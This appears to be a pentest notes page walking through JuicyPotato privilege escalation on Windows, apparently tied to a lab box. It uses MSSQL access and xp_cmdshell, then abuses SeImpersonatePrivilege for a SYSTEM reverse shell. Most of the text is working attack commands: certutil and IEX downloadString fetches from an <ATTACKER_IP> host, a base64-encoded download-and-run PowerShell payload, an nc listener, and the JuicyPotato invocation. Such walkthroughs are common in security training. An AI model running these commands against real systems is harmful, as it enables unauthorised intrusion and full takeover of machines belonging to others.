WINDOWS POTATOES

PRIMARY CATEGORY → SEIMPERSONATEPRIVILEGE

JuicyPotato

Code Execution as LOCAL SYSTEM

It does not work on WS2019 and W10 build 1809 onwards

Let’s suppose we gain access privileged access to a domain-joined machine and we find out a creds.txt file located on the Administrator’s desktop folder

It contains credentials of a domain user account which has privileges over a MSSQL instance of domain-joined MSSQL server

Connecting to the MSSQL Instance

Therefore, we can leverage this credentials to establish a connection to the MSSQL instance as the given principal

To do so, we can proceed as follows

Impacket’s MSSQLClient.py

mssqlclient.py -dc-ip '<DC>' -windows-auth '<DOMAIN>/<USER>:<PASSWD>@<MSSQL_SERVER>'

Gaining Code Execution through the XP_CMDSHELL Procedure

Since the given domain user account has a sysadmin role within the MSSQL instance, we can enable the XP_CMDSHELL stored procedure to be able to run system commands as the given domain or local service account

Enabling XP_CMDSHELL

SQL> enable_xp_cmdshell

Running System Commands

SQL> xp_cmdshell <COMMAND>

Verifying Sensitive Privileges

Retrieving the Service Account Name

First, we can run the following command to retrieve the name of the service account running the MSSQL instance

SQL> xp_cmdshell whoami

Command Output

nt service\mssql$sqlexpress01

And we are able to run commands as a LOCAL SERVICE account

Verifying the Service Account Privileges

Most of the LOCAL SERVICE accounts typically have sensitive privileges such as seImpersonatePriviliege enabled

If so, we can leverage the latter to coerce a process running as LOCAL SYSTEM to authenticate itself to an IPC endpoint that we have set up previously

This way we will have an specific thread running under the security context of the LOCAL SYSTEM account through client impersonation carried out by us by leveraging the seImpersonatePrivilege of the LOCAL SERVICE account

From here, we call the following API Functions →

• OpenThreadToken → Get a handler pointing to the Thread’s Impersonation Token

• DuplicateTokenEx(…TokenType=TokenPrimary) → Duplicate the Impersonation Token and obtain a Primary Token

• CreateProcessWithTokenW or CreateProcessAsUser → Create a new process associated with the New Primary Token and thus running under the security context of LOCAL SYSTEM

So, in order to carry out the workflow in question, we must have the seImpersonatePrivilege enabled, we can verify this as follows

SQL> xp_cmdshell whoami /priv

Command Output

PRIVILEGES INFORMATION                                                             
----------------------                                                             
Privilege Name                Description                               State      
 
============================= ========================================= ========   
 
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled   
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled   
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled    
SeManageVolumePrivilege       Perform volume maintenance tasks          Enabled    
SeImpersonatePrivilege        Impersonate a client after authentication Enabled    
SeCreateGlobalPrivilege       Create global objects                     Enabled    
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

And it is!

Therefore, we can upload a JuicyPotato binary to the target in order to send a Reverse Shell as LOCAL SYSTEM to our attacker machine

Extracting valid CLSIDs

CLSID List

GetCLSID.ps1

Downloading the PS Script

From the attacker ⚔️

curl --silent --location --request GET --remote-name 'https://github.com/ohpe/juicy-potato/raw/refs/heads/master/CLSID/GetCLSID.ps1'

Transferring it to the target

From the attacker ⚔️

python3 -m http.server 80

From the target 🎯

mkdir "$env:systemroot\Temp\LPE"
cd "$env:systemroot\Temp\LPE"

IEX (New-Object Net.WebClient).downloadString('http://<ATTACKER_IP>/GetCLSID.ps1')

Listing the available CLSIDs

From the target 🎯

Get-Content '.\<DIRECTORY>\CLSID.list'

Getting Command Execution as LOCAL SYSTEM

Downloading the JuicyPotato executable

From the attacker ⚔️

curl --silent --location --request GET 'https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe' --remote-name

Transferring JuicyPotato to the Target

From the attacker ⚔️

python3 -m http.server 80

From the target 🎯

certutil.exe -urlcache -split -f 'http://<ATTACKER_IP>/JuicyPotato.exe'

Downloading a PS Reverse Shell Oneliner

From the attacker ⚔️

curl --silent --location --request GET 'https://github.com/samratashok/nishang/raw/refs/heads/master/Shells/Invoke-PowerShellTcpOneLine.ps1' --output rev.ps1

Then, we edit it and replace the IP Address and TCP Port with our own

Setting up the PS Command we will pass to the JuicyPotato Binary

From the attacker ⚔️

echo -n 'IEX (New-Object Net.WebClient).downloadString("http://<ATTACKER_IP>/rev.ps1")' | iconv --from-code UTF-8 --to-code UTF-16LE | base64 -w 0 ; echo

Command Output

SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8APABBAFQAVABBAEMASwBFAFIAXwBJAFAAPgAvAHIAZQB2AC4AcABzADEAIgApAA==

Setting up a TCP Listener

From the attacker ⚔️

Same TCP Port as the one specified in rev.ps1

rlwrap -CaR nc -nlvp <PORT>

Running the Exploit

From the target 🎯

.\JuicyPotato.exe -t * -l 1337 -p cmd.exe -a "/c powershell.exe -EncodedCommand SQBFAFgAIAAoAE4AZQB3...AA==" -c '<CLSID>'

e.g.

.\JuicyPotato.exe -l 1337 -t * -p cmd.exe -a '/c powershell.exe -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0....AA==' -c '{C49E32C6-BC8B-11d2-85D4-00105A1F8304}'

Then, we will receive an incoming reverse shell as LOCAL SYSTEM

---

Examples

• 
  • JEEVES